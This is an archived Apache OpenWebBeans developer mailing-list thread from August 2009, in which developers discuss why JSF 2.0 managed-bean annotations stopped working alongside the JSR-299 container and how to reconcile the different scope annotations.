X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO mail-ew0-f215.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 26 Aug 2009 15:26:38 +0000 Received: by ewy11 with SMTP id 11so266855ewy.35 for <[email protected]>; Wed, 26 Aug 2009 08:26:17 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:sender:received:in-reply-to :references:date:x-google-sender-auth:message-id:subject:from:to :content-type:content-transfer-encoding; bh=FjZYYSuYJxRnaXPX4x/GeGKfNdG6vtyKFEbJeIFFcK0=; b=aUiQ/On3+Qkan1+ZCgOxeZTOzwTJVq60tHef6FnX+9oWopDsUEdSaNUQvdXj3h1J9b zpZSagI+mAmBTU0Ad7/DOczdVzPkCaI+KIItocUih4/W067rhKJD1FiwJfNDmoCtuMuj Piy34N0hArkzNgG5ZYkz5GPRVhm/iaalwc6FI= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:sender:in-reply-to:references:date :x-google-sender-auth:message-id:subject:from:to:content-type :content-transfer-encoding; b=frU+tLIDLujrWMWrl4BWYVaFOWcSw0MN3TxapvNfTWVMFdBXWL9xvkfIJTmCGUKLkx arg6lczjRcybk6tBRqJ+LzB6IUF4UJhx1VP9cV7eq7yqWY/qxcjpYos9piJP1EmH9UPH DpXIhNwat85cuijgw5QjAHKZp98FNGPt8WNHQ= MIME-Version: 1.0 Sender: [email protected] Received: by 161.129.204.104 with SMTP id g17mr8448000ebd.9.1251300375028; Wed, 26 Aug 2009 08:26:15 -0700 (PDT) In-Reply-To: <[email protected]> References: <[email protected]> <{{EMAIL+PHONE}}> <[email protected]> Date: Wed, 26 Aug 2009 17:26:14 +0200 X-Google-Sender-Auth: 4b8c26ee23cdbf4b Message-ID: <[email protected]> Subject: Re: WebBeans "eating" JSF 2.0 annotations ? From: Matthias Wessendorf <[email protected]> To: [email protected] Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable X-Virus-Checked: Checked by ClamAV on apache.org On Wed, Aug 26, 2009 at 5:23 PM, Matthias Wessendorf<[email protected]> wro= te: > On Wed, Aug 26, 2009 at 5:17 PM, Mark Struberg<[email protected]> wrote: >> for what I know (discussion on wb-dev) JSF apps should use JSR-299 @Scop= eType annotated scopes (renamed to @NormalScope in the latest spec) and not= faces scopes. I did hope that we could unify all scopes by generally using= JSR-330 javax.inject.Scope in all EE fields. But that will not work until = JSR-299 also recognizes and treats JSR-330 scopes as normal scopes. >> > > WTF ? :) > > It is kinda odd that JSF 2.0 has should use the 299 stuff. Standalone, > ok all fine (not tested). > But even if there are both in the game jsf2.0 and 299, they should > just work (or at least I should > get a warning that the bean is using a (good) -sorry- incorrect... annota= tion. > > Basically this is a total mess. Annontations work standalone, but not > when adding some heavyweight > stuff (like 299) to the game ? Oh boy... I am pretty sure that this will introcude a lot of fun to folks writing JSF 2.0 applications, if your statement is true. That would worse than the JSP 2.1 dependency (with JSF 1.2) I filed this bug: https://issues.apache.org/jira/browse/OWB-133 At least there should be some help. Not everybody is thrilled to replace annotations based on the environment (at least not me) > > -Matthias > >> LieGrue, >> strub >> >> >> --- On Wed, 8/26/09, Matthias Wessendorf <[email protected]> wrote: >> >>> From: Matthias Wessendorf <[email protected]> >>> Subject: Re: WebBeans "eating" JSF 2.0 annotations ? >>> To: [email protected] >>> Date: Wednesday, August 26, 2009, 5:11 PM >>> has no effect. The beast can't find >>> the JSF beans. >>> Due to lack of time, I am going with JSF 2.0 standalone. >>> >>> Question is: as it was working the current behavior is a >>> regression, >>> has there been any testing on OBW + JSF 2.0 ? >>> >>> -Matthias >>> >>> On Wed, Aug 26, 2009 at 3:45 PM, Gurkan Erdogdu<[email protected]= m> >>> wrote: >>> > It must not eat. >>> > >>> > But one point, >>> > >>> > You still use old XML configuration file format. As a >>> default OWB uses new >>> > XML format. Add >>> > https://svn.apache.org/repos/asf/incubator/openwebbeans/trunk/samples= /guess/src/main/resources/META-INF/openwebbeans/openwebbeans.properties >>> > >>> > in your project resources/META-INF/openwebbeans folder >>> and sure that all >>> > libraries are ok. >>> > >>> > You can look necessary libs from guess.war . You can >>> create it from mvn >>> > package -Pjetty. >>> > >>> > --Gurkan >>> > >>> > >>> > 2009/8/26 Matthias Wessendorf <[email protected]> >>> > >>> >> Hi, >>> >> >>> >> is it possible that the current trunk is _eating_ >>> JSF 2.0 annotations ? >>> >> >>> >> <someCode> >>> >> ... >>> >> import javax.faces.bean.ManagedBean; >>> >> import javax.faces.bean.SessionScoped; >>> >> >>> >> @ManagedBean(name=3D"playersBean") >>> >> @SessionScoped >>> >> public class ViewParamsBean >>> >> { >>> >> ... >>> >> </someCode> >>> >> >>> >> In June (before reflecting the >>> javax.enterprise.context changes) it was >>> >> working. >>> >> Now expressions like #{playersBean} are simply >>> ignored ;-) >>> >> >>> >> Demo project is here: >>> >> https://facesgoodies.googlecode.com/svn/CGN/trunk/ >>> >> >>> >> -Matthias >>> >> >>> >> >>> >> -- >>> >> Matthias Wessendorf >>> >> >>> >> blog: http://matthiaswessendorf.wordpress.com/ >>> >> sessions: http://www.slideshare.net/mwessendorf >>> >> twitter: http://twitter.com/mwessendorf >>> >> >>> > >>> > >>> > >>> > -- >>> > Gurkan Erdogdu >>> > http://gurkanerdogdu.blogspot.com >>> > >>> >>> >>> >>> -- >>> Matthias Wessendorf >>> >>> blog: http://matthiaswessendorf.wordpress.com/ >>> sessions: http://www.slideshare.net/mwessendorf >>> twitter: http://twitter.com/mwessendorf >>> >> >> >> >> > > > > -- > Matthias Wessendorf > > blog: http://matthiaswessendorf.wordpress.com/ > sessions: http://www.slideshare.net/mwessendorf > twitter: http://twitter.com/mwessendorf > --=20 Matthias Wessendorf blog: http://matthiaswessendorf.wordpress.com/ sessions: http://www.slideshare.net/mwessendorf twitter: http://twitter.com/mwessendorf From [email protected] Wed Aug 26 15:31:31 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 85735 invoked from network); 26 Aug 2009 15:31:30 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 26 Aug 2009 15:31:30 -0000 Received: (qmail 1402 invoked by uid 500); 26 Aug 2009 15:31:30 -0000 Delivered-To: [email protected] Received: (qmail 1386 invoked by uid 500); 26 Aug 2009 15:31:30 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <openwebbeans-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 1376 invoked by uid 99); 26 Aug 2009 15:31:30 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 26 Aug 2009 15:31:30 +0000 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (nike.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO mail-ew0-f215.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 26 Aug 2009 15:31:18 +0000 Received: by ewy11 with SMTP id 11so271988ewy.35 for <[email protected]>; Wed, 26 Aug 2009 08:30:58 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:sender:received:in-reply-to :references:date:x-google-sender-auth:message-id:subject:from:to :content-type; bh=R+6GDqvkxLs5nA+Dn3BwPdK2kkXHZqzho9T1XVfzQDQ=; b=kMaf34VQlREd88qzUb3G/BREq3LzNDw26ptiEcR/HarLTLHohijThfSd4FYf1thMeS oB/qQhXHX5D992IFjRLwz1DdkObTnZUyIGb9eFZTz1vfpEyawju78R31T/YaveYFWmWk 9wJBU2AxFat7t6AZOapjQKKRo5TsEiYwmgrG8= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:sender:in-reply-to:references:date :x-google-sender-auth:message-id:subject:from:to:content-type; b=e/hTIsc2NZmaEP3XbEP4c1UrTO+2FjWRhBL4C1I07gHoF5vsH2xbEObN5N8ynF35Hx dofyv8w/yc57Bt5e2NyIHOUS1Yljq/Sr3LqSpHbO0jJwT+eboGhwwI6tRbj6hN+3XHcY Mt1k3x+653XfK8uhzKMlaRfT2OcNq0Y1ZE6qQ= MIME-Version: 1.0 Sender: [email protected] Received: by 161.129.204.104 with SMTP id n6mr4061557ebd.42.1251300658242; Wed, 26 Aug 2009 08:30:58 -0700 (PDT) In-Reply-To: <[email protected]> References: <[email protected]> <[email protected]> Date: Wed, 26 Aug 2009 17:30:58 +0200 X-Google-Sender-Auth: 9ae1225b90a58624 Message-ID: <[email protected]> Subject: Re: Re: WebBeans "eating" JSF 2.0 annotations ? From: Matthias Wessendorf <[email protected]> To: [email protected], [email protected] Content-Type: text/plain; charset=ISO-8859-1 X-Virus-Checked: Checked by ClamAV on apache.org I haven't touched the POM (besides adding a dependency) and it was working in June :-) Also (see my other mail) my other managed beans now work (after replacing the JSF 2.0 annotations) -Matthias On Wed, Aug 26, 2009 at 5:28 PM, <[email protected]> wrote: > Have you changed to jetty embedded recently. as far as I remember, jsf2 is > not able to scan classes, when running jetty in embedded mode. > > br, Sven > > > Am +1-651-683-8696:11 schrieb Matthias Wessendorf <[email protected]>: >> has no effect. The beast can't find the JSF beans. >> >> Due to lack of time, I am going with JSF 2.0 standalone. >> >> >> >> Question is: as it was working the current behavior is a regression, >> >> has there been any testing on OBW + JSF 2.0 ? >> >> >> >> -Matthias >> >> >> >> On Wed, Aug 26, 2009 at 3:45 PM, Gurkan [email protected]> >> wrote: >> >> > It must not eat. >> >> > >> >> > But one point, >> >> > >> >> > You still use old XML configuration file format. As a default OWB uses >> > new >> >> > XML format. Add >> >> > >> > https://svn.apache.org/repos/asf/incubator/openwebbeans/trunk/samples/guess/src/main/resources/META-INF/openwebbeans/openwebbeans.properties >> >> > >> >> > in your project resources/META-INF/openwebbeans folder and sure that all >> >> > libraries are ok. >> >> > >> >> > You can look necessary libs from guess.war . You can create it from mvn >> >> > package -Pjetty. >> >> > >> >> > --Gurkan >> >> > >> >> > >> >> > 2009/8/26 Matthias Wessendorf [email protected]> >> >> > >> >> >> Hi, >> >> >> >> >> >> is it possible that the current trunk is _eating_ JSF 2.0 annotations ? >> >> >> >> >> >> >> >> >> ... >> >> >> import javax.faces.bean.ManagedBean; >> >> >> import javax.faces.bean.SessionScoped; >> >> >> >> >> >> @ManagedBean(name="playersBean") >> >> >> @SessionScoped >> >> >> public class ViewParamsBean >> >> >> { >> >> >> ... >> >> >> >> >> >> >> >> >> In June (before reflecting the javax.enterprise.context changes) it was >> >> >> working. >> >> >> Now expressions like #{playersBean} are simply ignored ;-) >> >> >> >> >> >> Demo project is here: >> >> >> https://facesgoodies.googlecode.com/svn/CGN/trunk/ >> >> >> >> >> >> -Matthias >> >> >> >> >> >> >> >> >> -- >> >> >> Matthias Wessendorf >> >> >> >> >> >> blog: http://matthiaswessendorf.wordpress.com/ >> >> >> sessions: http://www.slideshare.net/mwessendorf >> >> >> twitter: http://twitter.com/mwessendorf >> >> >> >> >> > >> >> > >> >> > >> >> > -- >> >> > Gurkan Erdogdu >> >> > http://gurkanerdogdu.blogspot.com >> >> > >> >> >> >> >> >> >> >> -- >> >> Matthias Wessendorf >> >> >> >> blog: http://matthiaswessendorf.wordpress.com/ >> >> sessions: http://www.slideshare.net/mwessendorf >> >> twitter: http://twitter.com/mwessendorf >> -- Matthias Wessendorf blog: http://matthiaswessendorf.wordpress.com/ sessions: http://www.slideshare.net/mwessendorf twitter: http://twitter.com/mwessendorf From [email protected] Wed Aug 26 15:40:28 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 88064 invoked from network); 26 Aug 2009 15:40:28 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 26 Aug 2009 15:40:28 -0000 Received: (qmail 18419 invoked by uid 500); 26 Aug 2009 15:40:28 -0000 Delivered-To: [email protected] Received: (qmail 18398 invoked by uid 500); 26 Aug 2009 15:40:28 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <openwebbeans-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 18358 invoked by uid 99); 26 Aug 2009 15:40:28 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 26 Aug 2009 15:40:28 +0000 X-ASF-Spam-Status: No, hits=1.2 required=10.0 tests=SPF_NEUTRAL X-Spam-Check-By: apache.org Received-SPF: neutral (nike.apache.org: local policy) Received: from [161.129.204.104] (HELO web27801.mail.ukl.yahoo.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with SMTP; Wed, 26 Aug 2009 15:40:15 +0000 Received: (qmail 82656 invoked by uid 60001); 26 Aug 2009 15:39:54 -0000 DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=yahoo.de; s=s1024; t=1251301194; bh=BAL36AIH9g1dj7v3IvpsvUpspcUnF2Ni0/wprQS66u8=; h=Message-ID:X-YMail-OSG:Received:X-Mailer:Date:From:Subject:To:In-Reply-To:MIME-Version:Content-Type; b=lniFZXSWBo3vMgjWgQvNJZiPvKbO3JfsgIQRokhPAPzDcGpTmCVLjdfArVwy9AH/J8Zir/9guPh3ej40dicuMlIdbu/2imubsu1t+WU6P7aQDunpsyDTvt0fVSPBtYGm2/AZWsaBwrJKClusIou9YA77/UGCyAJrf/5PUf9OsN0= DomainKey-Signature:a=rsa-sha1; q=dns; c=nofws; s=s1024; d=yahoo.de; h=Message-ID:X-YMail-OSG:Received:X-Mailer:Date:From:Subject:To:In-Reply-To:MIME-Version:Content-Type; b=erQVxghpwOeBkuHgeul+o+Rq0HnhR4Bm30FKR7Pi3SCY47HYuKPEmdlmR8UisD5A0AVd197E8pO1Hn9/MEpVZbQ82QYr8xsIXL873UsFZY2f8TDNVcmJMxaAuKkfL6PcsKWfmSlpR4nrrDk8vlIQsqArw3EDTfIwrdCNAGur4mE=; Message-ID: <[email protected]> X-YMail-OSG: lQ8org4VM1k88z3rfVRqkyUNJ6NEo1yT5Qr4bfHwVKus8UtAFWptAr4mBnCrrm25oHogYxhFYBCNbHFGAStKI6mwIzevmkOMgKrlc0jc3bu4Hrw4B3l.5VS1t9otl2owdl89zXydfb84N2DyBp8EwlMbYeBtMIMg4.GM17o5RFWp1787_tP7oybnUKx3zgImmUGTRx_bILrie1.7XOk2Qg8.jvpX5M5WjGFaSMmWs84Co.crCUkahcdgrHje6WZbJQ3sJ1dYojCaZ2r_.XJxR48_D4yq_NpBhhK5ofOsMxU_1eLEBzBo2W92JK_T8HSGCLB6EYrvNRIKU7TWGLf1zF33iMIZjxFZ64whwesLfAAcoa9FzCiX8_oddTt87_A1z9wDZrgW Received: from [161.129.204.104] by web27801.mail.ukl.yahoo.com via HTTP; Wed, 26 Aug 2009 15:39:53 GMT X-Mailer: YahooMailClassic/6.1.2 YahooMailWebService/0.7.338.2 Date: Wed, 26 Aug 2009 15:39:53 +0000 (GMT) From: Mark Struberg <[email protected]> Subject: Re: WebBeans "eating" JSF 2.0 annotations ? To: [email protected] In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Virus-Checked: Checked by ClamAV on apache.org In fact we (OWB) should provide standard context implementations for JSF annotated scopes. The whole picture: .) JSF scanns the classpath for JSF annotations .) OWB scanns the classpath for JSR-299 annotations In fact, I assume (not having looked at the code) that MyFaces provides kind of a mini DI container in the EL code. So any EL which will get through to the faces EL handler will successfully resolve those scoped beans Otoh, OWB also provides an EL handler which is dominant (prior in the EL chain). OWB currently simply ignores the javax.faces.scope annotations since they are 'unknown' for OWB. So this very class will look like a bean which has no [email protected]. The problem arises latest if JSF scoped beans need to be injected into JSR-299 beans and vice versa... an idea how to resolve this: We need to provide context implementations for the faces scopes in the webbeans-jsf module and let OWB do all the resolving. wdyt? LieGrue, strub --- On Wed, 8/26/09, Matthias Wessendorf <[email protected]> wrote: > From: Matthias Wessendorf <[email protected]> > Subject: Re: WebBeans "eating" JSF 2.0 annotations ? > To: [email protected] > Date: Wednesday, August 26, 2009, 5:26 PM > On Wed, Aug 26, 2009 at 5:23 PM, > Matthias Wessendorf<[email protected]> > wrote: > > On Wed, Aug 26, 2009 at 5:17 PM, Mark Struberg<[email protected]> > wrote: > >> for what I know (discussion on wb-dev) JSF apps > should use JSR-299 @ScopeType annotated scopes (renamed to > @NormalScope in the latest spec) and not faces scopes. I did > hope that we could unify all scopes by generally using > JSR-330 javax.inject.Scope in all EE fields. But that will > not work until JSR-299 also recognizes and treats JSR-330 > scopes as normal scopes. > >> > > > > WTF ? :) > > > > It is kinda odd that JSF 2.0 has should use the 299 > stuff. Standalone, > > ok all fine (not tested). > > But even if there are both in the game jsf2.0 and 299, > they should > > just work (or at least I should > > get a warning that the bean is using a (good) -sorry- > incorrect... annotation. > > > > Basically this is a total mess. Annontations work > standalone, but not > > when adding some heavyweight > > stuff (like 299) to the game ? Oh boy... > > I am pretty sure that this will introcude a lot of fun to > folks > writing JSF 2.0 applications, > if your statement is true. That would worse than the JSP > 2.1 > dependency (with JSF 1.2) > > I filed this bug: > https://issues.apache.org/jira/browse/OWB-133 > > At least there should be some help. Not everybody is > thrilled to > replace annotations based on > the environment (at least not me) > > > > > -Matthias > > > >> LieGrue, > >> strub > >> > >> > >> --- On Wed, 8/26/09, Matthias Wessendorf <[email protected]> > wrote: > >> > >>> From: Matthias Wessendorf <[email protected]> > >>> Subject: Re: WebBeans "eating" JSF 2.0 > annotations ? > >>> To: [email protected] > >>> Date: Wednesday, August 26, 2009, 5:11 PM > >>> has no effect. The beast can't find > >>> the JSF beans. > >>> Due to lack of time, I am going with JSF 2.0 > standalone. > >>> > >>> Question is: as it was working the current > behavior is a > >>> regression, > >>> has there been any testing on OBW + JSF 2.0 ? > >>> > >>> -Matthias > >>> > >>> On Wed, Aug 26, 2009 at 3:45 PM, Gurkan > Erdogdu<[email protected]> > >>> wrote: > >>> > It must not eat. > >>> > > >>> > But one point, > >>> > > >>> > You still use old XML configuration file > format. As a > >>> default OWB uses new > >>> > XML format. Add > >>> > https://svn.apache.org/repos/asf/incubator/openwebbeans/trunk/samples/guess/src/main/resources/META-INF/openwebbeans/openwebbeans.properties > >>> > > >>> > in your project > resources/META-INF/openwebbeans folder > >>> and sure that all > >>> > libraries are ok. > >>> > > >>> > You can look necessary libs from > guess.war . You can > >>> create it from mvn > >>> > package -Pjetty. > >>> > > >>> > --Gurkan > >>> > > >>> > > >>> > 2009/8/26 Matthias Wessendorf <[email protected]> > >>> > > >>> >> Hi, > >>> >> > >>> >> is it possible that the current trunk > is _eating_ > >>> JSF 2.0 annotations ? > >>> >> > >>> >> <someCode> > >>> >> ... > >>> >> import javax.faces.bean.ManagedBean; > >>> >> import > javax.faces.bean.SessionScoped; > >>> >> > >>> >> @ManagedBean(name="playersBean") > >>> >> @SessionScoped > >>> >> public class ViewParamsBean > >>> >> { > >>> >> ... > >>> >> </someCode> > >>> >> > >>> >> In June (before reflecting the > >>> javax.enterprise.context changes) it was > >>> >> working. > >>> >> Now expressions like #{playersBean} > are simply > >>> ignored ;-) > >>> >> > >>> >> Demo project is here: > >>> >> https://facesgoodies.googlecode.com/svn/CGN/trunk/ > >>> >> > >>> >> -Matthias > >>> >> > >>> >> > >>> >> -- > >>> >> Matthias Wessendorf > >>> >> > >>> >> blog: http://matthiaswessendorf.wordpress.com/ > >>> >> sessions: http://www.slideshare.net/mwessendorf > >>> >> twitter: http://twitter.com/mwessendorf > >>> >> > >>> > > >>> > > >>> > > >>> > -- > >>> > Gurkan Erdogdu > >>> > http://gurkanerdogdu.blogspot.com > >>> > > >>> > >>> > >>> > >>> -- > >>> Matthias Wessendorf > >>> > >>> blog: http://matthiaswessendorf.wordpress.com/ > >>> sessions: http://www.slideshare.net/mwessendorf > >>> twitter: http://twitter.com/mwessendorf > >>> > >> > >> > >> > >> > > > > > > > > -- > > Matthias Wessendorf > > > > blog: http://matthiaswessendorf.wordpress.com/ > > sessions: http://www.slideshare.net/mwessendorf > > twitter: http://twitter.com/mwessendorf > > > > > > -- > Matthias Wessendorf > > blog: http://matthiaswessendorf.wordpress.com/ > sessions: http://www.slideshare.net/mwessendorf > twitter: http://twitter.com/mwessendorf > From [email protected] Wed Aug 26 15:46:27 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 89764 invoked from network); 26 Aug 2009 15:46:27 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 26 Aug 2009 15:46:27 -0000 Received: (qmail 27748 invoked by uid 500); 26 Aug 2009 15:46:27 -0000 Delivered-To: [email protected] Received: (qmail 27730 invoked by uid 500); 26 Aug 2009 15:46:27 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <openwebbeans-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 27720 invoked by uid 99); 26 Aug 2009 15:46:27 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 26 Aug 2009 15:46:27 +0000 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (nike.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO ey-out-1920.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 26 Aug 2009 15:46:15 +0000 Received: by ey-out-1920.google.com with SMTP id 5so61854eyb.8 for <[email protected]>; Wed, 26 Aug 2009 08:45:54 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:sender:received:in-reply-to :references:date:x-google-sender-auth:message-id:subject:from:to :content-type:content-transfer-encoding; bh=OlBvZBYeOmNiBz5oVVlEqfeTWv/1ZGzF51035Ih/ErU=; b=fQD3UlDVdOmSF5/cB4MTOJUh5f8qvX3r9uqEY1r5eFgRtha/akivipZjwkwIr5M0TT VU77owx7NBMDuWxDXY/LayPpawin1AJMPppEtbHPVttwVdAsG8RgmseiIcOPhjX8O4IP 65XGc4AUgIkTEWpG1E+56aBhdQihVIvD2pkE8= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:sender:in-reply-to:references:date :x-google-sender-auth:message-id:subject:from:to:content-type :content-transfer-encoding; b=xhxhFmm/DSjKHD/PrK7JYAbk+vUFK+nGyBoc50TPSbGoXiGrn24VlAhSUnCxAHmmbi 9OmEDyz4pJ9SIhGxi1lgB6dLZ10KT8swrG1gxXUH8I1R+Vevcpd3XIckCfGnfvnO6Exo OksJ0sWSY/B02KVj2wWOaeHimeUT+mQ5UuHdU= MIME-Version: 1.0 Sender: [email protected] Received: by 161.129.204.104 with SMTP id a12mr4694768ebd.49.1251301554685; Wed, 26 Aug 2009 08:45:54 -0700 (PDT) In-Reply-To: <[email protected]> References: <[email protected]> <[email protected]> Date: Wed, 26 Aug 2009 17:45:54 +0200 X-Google-Sender-Auth: 7bac39290d3a2f6a Message-ID: <[email protected]> Subject: Re: WebBeans "eating" JSF 2.0 annotations ? From: Matthias Wessendorf <[email protected]> To: [email protected] Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable X-Virus-Checked: Checked by ClamAV on apache.org On Wed, Aug 26, 2009 at 5:39 PM, Mark Struberg<[email protected]> wrote: > In fact we (OWB) should provide standard context implementations for JSF = annotated scopes. > > The whole picture: > > .) =A0JSF scanns the classpath for JSF annotations > > .) OWB scanns the classpath for JSR-299 annotations > > In fact, I assume (not having looked at the code) that MyFaces provides k= ind of a mini DI container in the EL code. So any EL which will get through= to the faces EL handler will successfully resolve those scoped beans > > Otoh, OWB also provides an EL handler which is dominant (prior in the EL = chain). OWB currently simply ignores the javax.faces.scope annotations sinc= e they are 'unknown' for OWB. So this very class will look like a bean whic= h has no [email protected]. > > > The problem arises latest if JSF scoped beans need to be injected into JS= R-299 beans and vice versa... > > an idea how to resolve this: > We need to provide context implementations for the faces scopes in the we= bbeans-jsf module and let OWB do all the resolving. > > wdyt? yes, that's true. It is really a PITA to have three different ways to @inject stuff (in JavaEE - well the javax.faces.bean.** stuff is optional) I am pretty sure this will actually cause lot's of pain, trouble and bad blogs on JavaEE 6 (heck, deserved! :-) ) Are you able to bring this dilemma up on some EG ? (mismatch of all the stuff) -Matthias > > LieGrue, > strub > > > --- On Wed, 8/26/09, Matthias Wessendorf <[email protected]> wrote: > >> From: Matthias Wessendorf <[email protected]> >> Subject: Re: WebBeans "eating" JSF 2.0 annotations ? >> To: [email protected] >> Date: Wednesday, August 26, 2009, 5:26 PM >> On Wed, Aug 26, 2009 at 5:23 PM, >> Matthias Wessendorf<[email protected]> >> wrote: >> > On Wed, Aug 26, 2009 at 5:17 PM, Mark Struberg<[email protected]> >> wrote: >> >> for what I know (discussion on wb-dev) JSF apps >> should use JSR-299 @ScopeType annotated scopes (renamed to >> @NormalScope in the latest spec) and not faces scopes. I did >> hope that we could unify all scopes by generally using >> JSR-330 javax.inject.Scope in all EE fields. But that will >> not work until JSR-299 also recognizes and treats JSR-330 >> scopes as normal scopes. >> >> >> > >> > WTF ? :) >> > >> > It is kinda odd that JSF 2.0 has should use the 299 >> stuff. Standalone, >> > ok all fine (not tested). >> > But even if there are both in the game jsf2.0 and 299, >> they should >> > just work (or at least I should >> > get a warning that the bean is using a (good) -sorry- >> incorrect... annotation. >> > >> > Basically this is a total mess. Annontations work >> standalone, but not >> > when adding some heavyweight >> > stuff (like 299) to the game ? Oh boy... >> >> I am pretty sure that this will introcude a lot of fun to >> folks >> writing JSF 2.0 applications, >> if your statement is true. That would worse than the JSP >> 2.1 >> dependency (with JSF 1.2) >> >> I filed this bug: >> https://issues.apache.org/jira/browse/OWB-133 >> >> At least there should be some help. Not everybody is >> thrilled to >> replace annotations based on >> the environment (at least not me) >> >> > >> > -Matthias >> > >> >> LieGrue, >> >> strub >> >> >> >> >> >> --- On Wed, 8/26/09, Matthias Wessendorf <[email protected]> >> wrote: >> >> >> >>> From: Matthias Wessendorf <[email protected]> >> >>> Subject: Re: WebBeans "eating" JSF 2.0 >> annotations ? >> >>> To: [email protected] >> >>> Date: Wednesday, August 26, 2009, 5:11 PM >> >>> has no effect. The beast can't find >> >>> the JSF beans. >> >>> Due to lack of time, I am going with JSF 2.0 >> standalone. >> >>> >> >>> Question is: as it was working the current >> behavior is a >> >>> regression, >> >>> has there been any testing on OBW + JSF 2.0 ? >> >>> >> >>> -Matthias >> >>> >> >>> On Wed, Aug 26, 2009 at 3:45 PM, Gurkan >> Erdogdu<[email protected]> >> >>> wrote: >> >>> > It must not eat. >> >>> > >> >>> > But one point, >> >>> > >> >>> > You still use old XML configuration file >> format. As a >> >>> default OWB uses new >> >>> > XML format. Add >> >>> > https://svn.apache.org/repos/asf/incubator/openwebbeans/trunk/samp= les/guess/src/main/resources/META-INF/openwebbeans/openwebbeans.properties >> >>> > >> >>> > in your project >> resources/META-INF/openwebbeans folder >> >>> and sure that all >> >>> > libraries are ok. >> >>> > >> >>> > You can look necessary libs from >> guess.war . You can >> >>> create it from mvn >> >>> > package -Pjetty. >> >>> > >> >>> > --Gurkan >> >>> > >> >>> > >> >>> > 2009/8/26 Matthias Wessendorf <[email protected]> >> >>> > >> >>> >> Hi, >> >>> >> >> >>> >> is it possible that the current trunk >> is _eating_ >> >>> JSF 2.0 annotations ? >> >>> >> >> >>> >> <someCode> >> >>> >> ... >> >>> >> import javax.faces.bean.ManagedBean; >> >>> >> import >> javax.faces.bean.SessionScoped; >> >>> >> >> >>> >> @ManagedBean(name=3D"playersBean") >> >>> >> @SessionScoped >> >>> >> public class ViewParamsBean >> >>> >> { >> >>> >> ... >> >>> >> </someCode> >> >>> >> >> >>> >> In June (before reflecting the >> >>> javax.enterprise.context changes) it was >> >>> >> working. >> >>> >> Now expressions like #{playersBean} >> are simply >> >>> ignored ;-) >> >>> >> >> >>> >> Demo project is here: >> >>> >> https://facesgoodies.googlecode.com/svn/CGN/trunk/ >> >>> >> >> >>> >> -Matthias >> >>> >> >> >>> >> >> >>> >> -- >> >>> >> Matthias Wessendorf >> >>> >> >> >>> >> blog: http://matthiaswessendorf.wordpress.com/ >> >>> >> sessions: http://www.slideshare.net/mwessendorf >> >>> >> twitter: http://twitter.com/mwessendorf >> >>> >> >> >>> > >> >>> > >> >>> > >> >>> > -- >> >>> > Gurkan Erdogdu >> >>> > http://gurkanerdogdu.blogspot.com >> >>> > >> >>> >> >>> >> >>> >> >>> -- >> >>> Matthias Wessendorf >> >>> >> >>> blog: http://matthiaswessendorf.wordpress.com/ >> >>> sessions: http://www.slideshare.net/mwessendorf >> >>> twitter: http://twitter.com/mwessendorf >> >>> >> >> >> >> >> >> >> >> >> > >> > >> > >> > -- >> 